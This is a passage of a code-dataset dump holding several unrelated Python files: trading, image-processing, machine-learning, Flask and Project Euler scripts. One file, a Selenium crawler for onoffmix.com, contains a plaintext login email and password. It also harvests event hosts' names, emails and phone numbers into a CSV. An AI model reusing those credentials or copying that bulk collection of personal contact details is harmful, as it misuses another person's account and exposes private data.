0))\n","sub_path":"bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"153250060","text":"#!/usr/bin/env python\n# -*- coding: utf-8; py-indent-offset:4 -*-\n###############################################################################\n#\n# Copyright (C) 2018 Daniel Rodriguez\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n###############################################################################\nfrom __future__ import (absolute_import, division, print_function,\n                        unicode_literals)\n\nimport backtrader as bt\nfrom datetime import datetime\nimport csv\n\nclass St(bt.Strategy):\n    def logdata(self):\n        txt = []\n        txt.append('{}'.format(len(self)))\n        txt.append('{}'.format(self.data.datetime.datetime(0).isoformat()))\n        txt.append('{:.2f}'.format(self.data.open[0]))\n        txt.append('{:.2f}'.format(self.data.high[0]))\n        txt.append('{:.2f}'.format(self.data.low[0]))\n        txt.append('{:.2f}'.format(self.data.close[0]))\n        txt.append('{:.2f}'.format(self.data.volume[0]))\n\n        f = open('output_ib.txt', 'a')\n        f.write(','.join(txt))\n        f.close()\n\n    data_live = False\n\n    def notify_data(self, data, status, *args, **kwargs):\n        f = open('output_ib.txt', 'a')\n        f.write('*' * 5 + 'DATA NOTIF:' + data._getstatusname(status))\n        f.close()\n\n        if status == data.LIVE:\n            self.data_live = True\n\n\ncerebro = bt.Cerebro()\n\ncerebro.addstrategy(St)\n\nibstore = bt.stores.IBStore(host='127.0.0.1', port=7497, clientId=100)\n\ndatalist = [\n    'GOOG',\n    # 'SP500',\n    # 'EURUSD',\n    # 'GC',\n    # 'C',\n    # 'UD.C',\n]\n\n#Loop through the list adding to cerebro. MODIFIED\nfor i in range(len(datalist)):\n    data = ibstore.getdata( dataname=datalist[i], timeframe=bt.TimeFrame.Seconds, compression = 5)\n    cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=5)\n\ncerebro.run()","sub_path":"181202_IB_test.py","file_name":"181202_IB_test.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"323488133","text":"# warp image\n\nimport cv2\nimport os\nimport numpy as np\nfrom LivestockCV.core import print_image\nfrom LivestockCV.core import plot_image\nfrom LivestockCV.core import fatal_error\nfrom LivestockCV.core import color_palette\nfrom LivestockCV.core import params\nfrom LivestockCV.core.figures import overlay_two_imgs\n\n\ndef warp(img, refimg, pts, refpts, method='default'):\n    \"\"\"Warp an image to another perspective\n\n    Inputs:\n    img = grayscale or binary image data to be warped\n    refimg = RGB or grayscale image data to be used as reference\n    pts = 4 coordinates on img\n    refpts = 4 coordinates on refimg\n    method = method of finding the transformation. 
'default', 'ransac', 'lmeds', 'rho'\n Returns:\n warped_img = warped image\n\n :param img: numpy.ndarray\n :param refimg: numpy.ndarray\n :param pts: list of tuples\n :param refpts: list of tuples\n :param method: str\n :return warped_img: numpy.ndarray\n \"\"\"\n\n params.device += 1\n\n if len(pts) != 4 or len(refpts) != 4:\n fatal_error('Please provide 4 pairs of corresponding coordinates.')\n if len(img.shape) > 2:\n fatal_error('The input `img` should be grayscale or binary.')\n\n methods = {\n 'default': 0,\n 'ransac': cv2.RANSAC,\n 'lmeds': cv2.LMEDS,\n 'rho': cv2.RHO}\n\n shape_ref = refimg.shape\n rows_ref, cols_ref = shape_ref[0:2]\n\n # convert list of tuples to array for cv2 functions\n ptsarr = np.array(pts, dtype='float32')\n refptsarr = np.array(refpts, dtype='float32')\n\n # find tranformation matrix and warp\n mat, _ = cv2.findHomography(ptsarr, refptsarr, method=methods.get(method))\n warped_img = cv2.warpPerspective(src=img, M=mat, dsize=(cols_ref, rows_ref))\n\n # preserve binary\n if len(np.unique(img)) == 2:\n warped_img[warped_img > 0] = 255\n\n if params.debug is not None:\n # scale marker_size and line_thickness for different resolutions\n rows_img = img.shape[0]\n if rows_img > rows_ref:\n res_ratio_i = int(np.ceil(rows_img/rows_ref)) # ratio never smaller than 1 with np.ceil\n res_ratio_r = 1\n else:\n res_ratio_r = int(np.ceil(rows_ref/rows_img))\n res_ratio_i = 1\n # marker colors\n colors = color_palette(len(pts))\n\n # temp rgb image for colored markers on img\n img2 = img.copy()\n img2 = cv2.merge((img2, img2, img2))\n for i, pt in enumerate(pts):\n cv2.drawMarker(img2,\n pt,\n color=colors[i],\n markerType=cv2.MARKER_CROSS,\n markerSize=params.marker_size*res_ratio_i,\n thickness=params.line_thickness*res_ratio_i)\n\n # temp rgb image for colored markers on refimg\n refimg2 = refimg.copy()\n if len(shape_ref) == 2:\n refimg2 = cv2.merge((refimg2, refimg2, refimg2))\n for i, pt in enumerate(refpts):\n cv2.drawMarker(refimg2,\n pt,\n color=colors[i],\n markerType=cv2.MARKER_CROSS,\n markerSize=params.marker_size*res_ratio_r,\n thickness=params.line_thickness*res_ratio_r)\n\n debug_mode = params.debug\n params.debug = None\n img_blend = overlay_two_imgs(warped_img, refimg)\n params.debug = debug_mode\n\n if params.debug == 'plot':\n plot_image(img2)\n plot_image(refimg2)\n plot_image(img_blend)\n if params.debug == 'print':\n print_image(img2, os.path.join(params.debug_outdir, str(params.device) + \"_img-to-warp.png\"))\n print_image(refimg2, os.path.join(params.debug_outdir, str(params.device) + \"_img-ref.png\"))\n print_image(img_blend, os.path.join(params.debug_outdir, str(params.device) + \"_warp_overlay.png\"))\n\n return warped_img\n","sub_path":"src/LivestockCV/core/transform/warp.py","file_name":"warp.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"184823251","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn\nfrom sklearn.preprocessing import minmax_scale\n\n\ndef sigmoid(x):\n return 1.0 / (1 + np.exp(-x))\n\n\ndef loss_func(y, pred):\n return (-y * np.log(pred) - (1 - y) * np.log(1 - pred)).sum()\n\n\ndef grad_func(X, y, pred):\n return X.T @ (pred - y) / y.size\n\n\ndef accuracy_score(X, y, w):\n pred = sigmoid(np.dot(X, w))\n pred[pred >= 0.5] = 1\n pred[pred < 0.5] = 0\n acc = np.sum(pred == y) / y.size\n return acc\n\n\ndef logistic_L2(X, y, alpha=1e-1, lambda_cofee=1e-2, max_iter=2000, eps=1e-4):\n 
# data num\n N = X.shape[0]\n # feature num\n d = X.shape[1]\n # init w\n w = np.ones(X.shape[1])\n # history\n acc_his = []\n loss_his = []\n grad_his = []\n for i in range(int(max_iter)):\n acc = accuracy_score(X, y, w)\n pred = sigmoid(np.dot(X, w))\n loss = loss_func(y, pred)\n grad = grad_func(X, y, pred)\n # convergence?\n if np.linalg.norm(grad) < eps:\n break\n # recored history\n acc_his.append(acc)\n loss_his.append(loss)\n grad_his.append(np.linalg.norm(grad))\n\n # update w\n w = w + alpha / N * ((y - (sigmoid(X @ w))) @ X)\n # L2\n w = w - alpha * lambda_cofee * w\n fig, ax = plt.subplots(3, figsize=(13, 13))\n ax[0].set_title('Accurary')\n ax[0].plot(acc_his)\n ax[1].set_title('Loss')\n ax[1].plot(loss_his)\n ax[2].set_title('GradNorm')\n ax[2].plot(grad_his)\n plt.show()\n return w\n\n\nif __name__ == '__main__':\n # Load\n X_train = pd.read_csv('pa2_train_X.csv')\n y_train = pd.read_csv('pa2_train_y.csv')\n X_val = pd.read_csv('pa2_dev_X.csv')\n y_val = pd.read_csv('pa2_dev_y.csv')\n features = X_train.columns\n\n # Preprocessing\n X_train[['Age', 'Annual_Premium', 'Vintage']] = minmax_scale(X_train[['Age', 'Annual_Premium', 'Vintage']])\n X_val[['Age', 'Annual_Premium', 'Vintage']] = minmax_scale(X_val[['Age', 'Annual_Premium', 'Vintage']])\n X_train = X_train.to_numpy()\n y_train = y_train.to_numpy()\n X_val = X_val.to_numpy()\n y_val = y_val.to_numpy()\n y_train = y_train.squeeze()\n y_val = y_val.squeeze()\n\n # different lambda\n w0 = logistic_L2(X_train, y_train, lambda_cofee=0)\n w1 = logistic_L2(X_train, y_train, lambda_cofee=1e-1)\n w2 = logistic_L2(X_train, y_train, lambda_cofee=1e-2)\n w3 = logistic_L2(X_train, y_train, lambda_cofee=1e-3)\n w4 = logistic_L2(X_train, y_train, lambda_cofee=1e-4)\n w5 = logistic_L2(X_train, y_train, lambda_cofee=1e-5)\n\n # metirc\n w0_train_acc = accuracy_score(X_train, y_train, w0)\n w0_val_acc = accuracy_score(X_val, y_val, w0)\n w1_train_acc = accuracy_score(X_train, y_train, w1)\n w1_val_acc = accuracy_score(X_val, y_val, w1)\n w2_train_acc = accuracy_score(X_train, y_train, w2)\n w2_val_acc = accuracy_score(X_val, y_val, w2)\n w3_train_acc = accuracy_score(X_train, y_train, w3)\n w3_val_acc = accuracy_score(X_val, y_val, w3)\n w4_train_acc = accuracy_score(X_train, y_train, w4)\n w4_val_acc = accuracy_score(X_val, y_val, w4)\n w5_train_acc = accuracy_score(X_train, y_train, w5)\n w5_val_acc = accuracy_score(X_val, y_val, w5)\n\n train_acc = [w0_train_acc, w1_train_acc, w2_train_acc, w3_train_acc, w4_train_acc, w5_train_acc]\n val_acc = [w0_val_acc, w1_val_acc, w2_val_acc, w3_val_acc, w4_val_acc, w5_val_acc]\n labels = ['1e0', '1e-1', '1e-2', '1e-3', '1e-4', '1e-5']\n w_list = [w0, w1, w2, w3, w4, w5]\n\n # plot\n x = np.arange(len(labels)) # the label locations\n width = 0.35 # the width of the bars\n\n fig, ax = plt.subplots(figsize=(12, 12))\n ax.bar(x - width / 2, train_acc, width, label='TrainSetAcc')\n ax.bar(x + width / 2, val_acc, width, label='ValSetAcc')\n ax.set_ylabel('Accuracy')\n ax.set_ylim(0.75, 0.8)\n ax.set_title('Accuracy of Train and Val with L2')\n ax.set_xticks(x)\n ax.set_xticklabels(labels)\n ax.legend()\n\n plt.show()\n\n # sorted features\n sorted_features = features[np.argsort(np.abs(w_list[np.argmax(val_acc)]))[::-1]]\n # top 5\n print(sorted_features[:5])\n # zero num\n print(np.sum(np.abs(w_list[np.argmax(val_acc)]) < 1e-6))\n","sub_path":"Logistic 
regression/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613781263","text":"from flask import Flask, render_template, request,url_for\nimport requests\nimport pickle\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\napp = Flask(__name__)\nmodel_filename = \"RFmodel.pkl\"\nmodel = pickle.load(open(model_filename, 'rb'))\n\n@app.route('/',methods=['GET'])\ndef hello():\n return render_template('homepage.html')\n\n@app.route('/calc_price',methods=['POST'])\ndef calc_price():\n if request.method == \"POST\":\n yrs_old = int(request.form['car_age'])\n Present_Price = float(request.form['ori_price'])\n Kms_Driven = int(request.form['kms_driven'])\n Owner = request.form['owner_type']\n if (Owner == \"First hand\"):\n Owner = 0\n elif (Owner == \"Second_hand\"):\n Owner = 1\n else:\n Owner = 3\n Fuel_Type_Petrol = request.form['fuel_type']\n if (Fuel_Type_Petrol == \"Petrol\"):\n Fuel_Type_Petrol = 1\n else:\n Fuel_Type_Petrol = 0\n Seller_Type_Individual = request.form['seller_type']\n if (Seller_Type_Individual == \"Individual\"):\n Seller_Type_Individual = 1\n else:\n Seller_Type_Individual = 0\n Transmission_Manual = request.form['seller_type']\n if (Transmission_Manual == \"Manual\"):\n Transmission_Manual = 1\n else:\n Transmission_Manual = 0\n\n prediction=model.predict([[Present_Price,Kms_Driven,Owner,yrs_old,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Manual]])\n output=round(prediction[0],2)\n if output<0:\n return render_template('result.html',prediction_texts=\"Sorry you cannot sell this car\")\n else:\n return render_template('result.html',prediction_text=\"You Can Sell your car for {} Lakhs\".format(output))\n else:\n return render_template('result.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"70331501","text":"from src.simulation import simulate_pop\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom matplotlib import cm\n\n\ndef show_multiple_gen_paths(gen_tracked_paths):\n \"\"\"Plots paths for multiple generations.\n\n Creates 5 plots evenly spaced across the selected evolution, such that the first and last generation is included.\n Plots show tracked paths for each individual as seen from on top.\n\n Parameters\n ----------\n gen_tracked_paths : list\n Tracker for multiple generations.\n \"\"\"\n\n # show paths for multiple generations\n coord_max = 0\n\n # find maximum coordinate for axis scaling\n for tracked_paths in gen_tracked_paths:\n for key in tracked_paths.keys():\n tracked_path = np.asarray(tracked_paths[key])\n if np.max(np.abs(tracked_path)) > coord_max:\n coord_max = np.max(np.abs(tracked_path))\n\n # ensure enough generations to be split in 5 plots\n if len(gen_tracked_paths) > 4:\n gens = list(range(0, len(gen_tracked_paths), int(len(gen_tracked_paths) / 5)))\n else:\n gens = list(range(len(gen_tracked_paths)))\n\n # ensure last generation is displayed\n if not gens[-1] == (len(gen_tracked_paths) - 1):\n gens += [len(gen_tracked_paths) - 1]\n\n # set plotting title according to selected or index\n for idx, tracked_paths in enumerate([gen_tracked_paths[gen] for gen in gens]):\n if gens is not None:\n gen = gens[idx]\n else:\n gen = idx\n\n # perform plotting\n 
show_path(tracked_paths, coord_max * 1.1, title='paths of gen {}'.format(gen))\n\n\ndef show_path(tracked_paths, ax_lim=None, title='paths of individuals'):\n \"\"\"Show tracked path for single (multicolored) or multiple (one color per individual) individuals.\n\n Plots the tracked path for selected individuals. If only one individual was selected, a multicolored line indicates\n the progress of the selected individual. If multiple individuals were selected, a new color will be assigned to each\n individual.\n\n Parameters\n ----------\n tracked_paths : dict\n Tracker for one generation. Each key is a different individual.\n ax_lim : float | int\n Axis limit +- selected value.\n title : str\n Plot title.\n \"\"\"\n # show paths for one generation\n plt.figure()\n plt.gcf().set_facecolor('black')\n\n # iterate over individuals\n for key in tracked_paths.keys():\n tracked_path = np.asarray(tracked_paths[key])\n\n if len(tracked_paths) > 1:\n plt.plot(tracked_path[:, 0], tracked_path[:, 1])\n plt.scatter(tracked_path[0, 0], tracked_path[0, 1])\n plt.title(title, color='white')\n else:\n c_map = cm.get_cmap('viridis', 255)(np.linspace(0, 1, len(tracked_path)))[:, 0:3]\n for data_point in range(len(tracked_path) - 1):\n plt.plot(tracked_path[data_point:(data_point + 2), 0], tracked_path[data_point:(data_point + 2), 1],\n color=c_map[data_point, :])\n plt.title('path of individual', color='white')\n\n plt.scatter(tracked_path[-1, 0], tracked_path[-1, 1], color='yellow')\n plt.scatter(tracked_path[0, 0], tracked_path[0, 1], color='white')\n plt.gca().set_facecolor('black')\n plt.gca().spines['bottom'].set_color('white')\n plt.gca().spines['top'].set_color('white')\n plt.gca().spines['left'].set_color('white')\n plt.gca().spines['right'].set_color('white')\n plt.gca().xaxis.label.set_color('white')\n plt.gca().tick_params(axis='x', colors='white')\n plt.gca().yaxis.label.set_color('white')\n plt.gca().tick_params(axis='y', colors='white')\n plt.ylabel('y coordinate')\n plt.xlabel('x coordinate')\n if ax_lim is not None:\n plt.xlim((-ax_lim, ax_lim))\n plt.ylim((-ax_lim, ax_lim))\n plt.gca().set_aspect('equal', 'box')\n plt.show()\n\n\ndef show_stats(stats):\n \"\"\"Plots statistics for average and best performance over generations.\n\n Parameters\n ----------\n stats : list | np.array\n Statistics over generations.\n \"\"\"\n\n # show summary of fitness over all generations (average and best performer)\n stats = np.asarray(stats)\n plt.figure()\n plt.subplot(121)\n plt.plot(stats[:, 0], stats[:, 1])\n plt.xlabel('generation')\n plt.ylabel('fitness')\n plt.title('average performance over generations')\n\n plt.subplot(122)\n plt.plot(stats[:, 0], stats[:, 3])\n plt.xlabel('generation')\n plt.title('best performance over generations')\n plt.show()\n\n\ndef show_individual(gene_pool, evo_config, args):\n \"\"\"Renders a GUI based simulation for selected individuals.\n\n Displays a viewable simulation of all individuals in ``gene_pool``.\n\n Parameters\n ----------\n gene_pool : list\n List of genomes for all individuals. Created using :func:`src.IO.new_gene_pool`.\n evo_config : dict\n Configuration file for the current simulation. 
See :func:`src.IO.make_default_evo_config`.\n    args : argparse.Namespace\n        Parsed arguments.\n    \"\"\"\n\n    # show desired simulation\n    return simulate_pop(gene_pool, evo_config, args, track_individuals=True, direct=False)\n","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"380224871","text":"import torch.nn as nn\n\n\n\"\"\" Optional conv block \"\"\"\ndef conv_block(in_channels, out_channels):\n\n    return nn.Sequential(\n        nn.Conv2d(in_channels, out_channels, 3, padding=1),\n        nn.BatchNorm2d(out_channels),\n        nn.ReLU(),\n        nn.MaxPool2d(2)\n    )\n\n\n\"\"\" Define your own model \"\"\"\nclass FewShotModel(nn.Module):\n    def __init__(self, x_dim=3, hid_dim=64, z_dim=64):\n        super(FewShotModel, self).__init__()\n        self.encoder = nn.Sequential(\n            conv_block(x_dim, hid_dim),\n            conv_block(hid_dim, hid_dim),\n            conv_block(hid_dim, hid_dim),\n            conv_block(hid_dim, z_dim),\n        )\n\n        self.fc = nn.Sequential(\n            nn.Linear(64 * 20 * 20, 1024),\n        )\n\n    def forward(self, x):\n        # embedding_vector = self.encoder(x)\n        out = self.encoder(x)\n        dim = 1\n        for d in out.size()[1:]:\n            dim = dim*d\n        out = out.view(-1, dim)\n        embedding_vector = self.fc(out)\n        return embedding_vector\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292808158","text":"\n#%%\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\nimport requests\nimport numpy as np\nimport pandas as pd\nimport os\nimport time\n\n#os.chdir('/Users/hj/dev/meetup_crawl')\n#os.getcwd()\nprint(os.getcwd())\n\n#%%\n#run phantomJS\ndriver = webdriver.PhantomJS('./enviroments/phantomjs-2.1.1-macosx/bin/phantomjs')\n\n\n#%%\n#set the page load wait time\ndriver.implicitly_wait(5)#wait up to 5 seconds for web resources to load.\ndriver.set_script_timeout(5)\n\n\n#%%\n#baseURL\nbase_URL = 'https://www.onoffmix.com' #OnOffMix\ndriver.get(base_URL+'/account/login') #get the login page\n\n#%%\n#log in\ndriver.find_element_by_class_name('email').send_keys('kimzombie@hotmail.com')\ndriver.find_element_by_class_name('password').send_keys('asdf65851242!@')\n\ndriver.find_element_by_class_name('btn_submit').click()\n\ntry:\n    WebDriverWait(driver, 10).until(\n        EC.presence_of_all_elements_located((By.CLASS_NAME, \"user_name\")))\nexcept:\n    print('error')\n\n#%%\n#time.sleep(1)\n\n#move to the education page\ndriver.get(base_URL+'/event/main/?c=085')\n\n#sort by most recent\nrecent_selector = '#content > div > section.event_main_area > div.title_bar > ul.sort_menu > li:nth-child(2) > a'\ndriver.find_element_by_css_selector(recent_selector).click()\n\n\n#%% [markdown]\n# #page navigation\n# #driver.find_element_by_css_selector()\n# \n# #content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(3)\n# #content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(4)\n# \n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_prev'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.page_move.active.disabled'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(3)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(4)'\n# '#content > div > 
section.event_main_area > div.pagination_wrap > div > a:nth-child(5)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child(6)'\n# '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next'\n\n#%%\n#define a function that extracts each event detail page URL\ndef getURL():\n    temp_URL = []\n    move = ['3', '4', '5', '6'] # values used to select each pagination link\n    for v in move:\n        #time.sleep(1)\n\n        try:\n            WebDriverWait(driver, 10).until(\n                EC.element_to_be_clickable((By.CSS_SELECTOR, '#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child('+v+')')))\n            #print(v)\n        except:\n            print('error')\n\n        html = driver.page_source\n        list_soup = BeautifulSoup(html, 'html.parser')\n        list_selector = '#content > div > section.event_main_area > ul > li > article > a'\n        selected = list_soup.select(list_selector)\n        #print(1)\n        #print(selected)\n        #print(list_soup.select(list_selector))\n        \n        #extract each target page URL\n        for i in selected:\n            temp_URL.append(i.get(\"href\"))\n            #print(i.get(\"href\"))\n\n        \n        \n        #move to the next page\n        driver.find_element_by_css_selector('#content > div > section.event_main_area > div.pagination_wrap > div > a:nth-child('+v+')').click()\n        #print(v)\n    return temp_URL\n\n\n#%%\n#extract the event detail page URLs\ntarget_URL = []\nepoch = 1\nfor i in range(epoch):\n    try:\n        WebDriverWait(driver, 10).until(\n            EC.element_to_be_clickable((By.CSS_SELECTOR, '#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next')))\n    except:\n        print('error')\n    target_URL = target_URL + getURL()\n    \n    driver.find_element_by_css_selector('#content > div > section.event_main_area > div.pagination_wrap > div > a.btn_next').click()\n\n#len(target_URL)\n\n\n#%%\n#remove ad pages - a URL containing /cs/ is an ad\ncs = []\nfor n in target_URL:\n    cs.append(n.find(\"/cs/\"))\n\n    \ndel target_URL[cs.index(0)]\ntarget_URL\n\n\n#%%\n#selectors\n#title\ntitle_selector = '#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > h3'\n#event period\ndate_selector = \"#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(1) > p\"\n#event venue\nplace_selector = \"#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(2) > p > span\"\n#capacity\nlimitation_selector = '#content > div.content_wrapping.max_width_area > section.event_summary > div.right_area > ul > li:nth-child(3) > p > span.total > span'\n#speaker name\nname_selector = \"#hostInfo > li.host_name > a\"\n#speaker email\nemail_selector = \"#hostInfo > li.host_mail\"\n#speaker phone number\nphone_selector = \"#hostInfo > li.host_phone\"\n\n\n#%%\n#check whether the csv file exists; if not, create the folder and the csv file\nif os.path.exists('./data/onoffmix_data.csv'):\n    old_data = pd.read_csv('./data/onoffmix_data.csv', index_col=0)\nelse:\n    if not os.path.exists('./data'):\n        os.mkdir('./data/')\n    \n    df = pd.DataFrame(columns=['이름', '연락처', '이메일', '제목', '장소', '시간', '인원제한', 'URL'])\n    df.to_csv('./data/onoffmix_data.csv')\n    old_data = pd.read_csv('./data/onoffmix_data.csv', index_col=0)\n\n\n    \n\n#%%\nname_list = []\nlimitation_list = []\nplace_list = []\ndate_list = []\ntitle_list = []\nemail_list = []\nphone_list = []\nurl_list = []\nfor i in target_URL:\n    \n    #get each target URL\n    driver.get(base_URL+i)\n    #time.sleep(0.5)\n    \n\n    #soup the target page\n    target_html = driver.page_source\n    target_soup = BeautifulSoup(target_html, 'html.parser')\n    #target_soup\n\n    #extract elements from the soup and store them in lists\n    url_list.append(base_URL+i)\n\n    title_selected = target_soup.select(title_selector)\n    if 0 < len(title_selected):\n        
title_list.append(title_selected[0].text[21:-16])\n        print(title_selected[0].text[21:-16])\n    else:\n        title_list.append('no_title')\n        print('no_title')\n\n\n    date_selected = target_soup.select(date_selector)\n    if 0 < len(date_selected):\n        date_list.append(date_selected[0].text)\n        print(date_selected[0].text)\n    else:\n        date_list.append('no_date')\n        print('no_date')\n\n    place_selected = target_soup.select(place_selector)\n    if 0 < len(place_selected):\n        place_list.append(place_selected[0].text)\n        print(place_selected[0].text)\n    else:\n        place_list.append('no_place')\n        print('no_place')\n\n    limitation_selected = target_soup.select(limitation_selector)\n    if 0 < len(limitation_selected):\n        limitation_list.append(limitation_selected[0].text)\n        print(limitation_selected[0].text)\n    else: \n        limitation_list.append('no_limitation')\n        print('no_limitation')\n\n    name_selected = target_soup.select(name_selector)\n    if 0 < len(name_selected):\n        name_list.append(name_selected[0].text)\n        print(name_selected[0].text)\n    else:\n        name_list.append('no_name')\n        print('no_name')\n\n    email_selected = target_soup.select(email_selector)\n    if 0 < len(email_selected):\n        email_list.append(email_selected[0].text)\n        print(email_selected[0].text)\n    else:\n        email_list.append('no_email')\n        print('no_email')\n\n    phone_selected = target_soup.select(phone_selector)\n    if 0 < len(phone_selected):\n        phone_list.append(phone_selected[0].text)\n        print(phone_selected[0].text)\n    else:\n        phone_list.append('no_phone')\n        print('no_phone')\n\n\n\n#%%\n#append the new data\nnew_data = pd.DataFrame({'이름':name_list, '연락처':phone_list, '이메일':email_list, '제목':title_list, '장소':place_list, '시간':date_list, '인원제한':limitation_list, 'URL':url_list})\nresult_data = old_data.append(new_data, ignore_index=True)\n\n#drop duplicate entries\nresult_data.drop_duplicates(subset='URL', inplace=True)\n\n#export to file\nresult_data.to_csv(os.getcwd() + '/data/onoffmix_data.csv')\nprint('onoffmix_data.csv')\n\n#%%\ndriver.quit()\n\n\n\n\n#%%\nprint('name:' , len(name_list))\nprint('phone:', len(phone_list))\nprint('email:', len(email_list))\nprint('title:', len(title_list))\nprint('place:', len(place_list))\nprint('date:', len(date_list))\nprint('limit:', len(limitation_list))\nprint('URL:', len(url_list))","sub_path":"onoffmix_crawl_P.py","file_name":"onoffmix_crawl_P.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607366181","text":"'''\n\nLet d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).\nIf d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and each of a and b are called amicable numbers.\n\nFor example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. 
The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.\n\nEvaluate the sum of all the amicable numbers under 10000.\n\n'''\n\ndef getSumOfDivisors(n):\n\tsumDivisors = 1\n\tfor i in range(2,int(n**0.5)+1):\n\t\tif n % i == 0:\n\t\t\tsumDivisors += i\n\t\t\tsumDivisors += n // i\n\t\t\tif i**2 == n:\n\t\t\t\tsumDivisors -= i\n\treturn sumDivisors\n\n\n\n\ndef getAmicable(N):\n\tdone = {}\n\tamicableNumbers = []\n\tfor i in range(2,N):\n\t\tdone[i] = False\n\tfor number in range(2,N):\n\t\tif not done[number]:\n\t\t\tsumDivisors1 = getSumOfDivisors(number)\n\t\t\tdone[number] = True\n\t\t\tif sumDivisors1 == 1:\n\t\t\t\tcontinue\n\t\t\tif sumDivisors1 >= N:\n\t\t\t\tcontinue\n\t\t\tif not done[sumDivisors1]:\n\t\t\t\tsumDivisors2 = getSumOfDivisors(sumDivisors1)\n\t\t\t\tif number == sumDivisors2:\n\t\t\t\t\tamicableNumbers.append(sumDivisors1)\n\t\t\t\t\tamicableNumbers.append(sumDivisors2)\n\treturn amicableNumbers\n\n\nif __name__ == '__main__':\n\tprint(sum(getAmicable(10000)))","sub_path":"Problem21.py","file_name":"Problem21.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148802304","text":"import cv2\nfrom matplotlib import pyplot as plt\n\n\ndef showImage(img):\n    \"\"\"\n    Show the image twice: once with cv2 and once with matplotlib\n    :param img: path to the image file\n    \"\"\"\n    if not isinstance(img, str) or len(img) < 3:\n        return None\n\n    # cv2 load img and show\n    img = cv2.imread(img)\n    cv2.imshow('frame', img)\n\n    # show img in plt\n    plt.figure()\n    plt.axis(\"off\")\n    plt.imshow(img[:, :, ::-1])\n    plt.show()\n","sub_path":"Classwork3/showImage.py","file_name":"showImage.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"81352362","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Wizard.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport os.path as op\nfrom operator import itemgetter\n\nfrom ...utils import _is_array_like\nfrom .view_models import HTMLClusterViewModel\nfrom ...gui._utils import _read\n\n\n#------------------------------------------------------------------------------\n# Utility functions\n#------------------------------------------------------------------------------\n\ndef _argsort(seq, reverse=True, n_max=None):\n    \"\"\"Return the list of clusters in decreasing order of value from\n    a list of tuples (cluster, value).\"\"\"\n    out = [cl for (cl, v) in sorted(seq,\n                                    key=itemgetter(1),\n                                    reverse=reverse)]\n    if n_max in (None, 0):\n        return out\n    else:\n        return out[:n_max]\n\n\ndef _best_clusters(clusters, quality, n_max=None):\n    return _argsort([(cluster, quality(cluster))\n                     for cluster in clusters], n_max=n_max)\n\n\ndef _find_first(items, filter=None):\n    if not items:\n        return None\n    if filter is None:\n        return items[0]\n    return next(item for item in items if filter(item))\n\n\ndef _previous(items, current, filter=None):\n    if current not in items:\n        raise RuntimeError(\"{0} is not in {1}.\".format(current, items))\n    i = items.index(current)\n    if i == 0:\n        return current\n    try:\n        return _find_first(items[:i][::-1], filter)\n    except StopIteration:\n        return current\n\n\ndef _next(items, current, filter=None):\n    if not 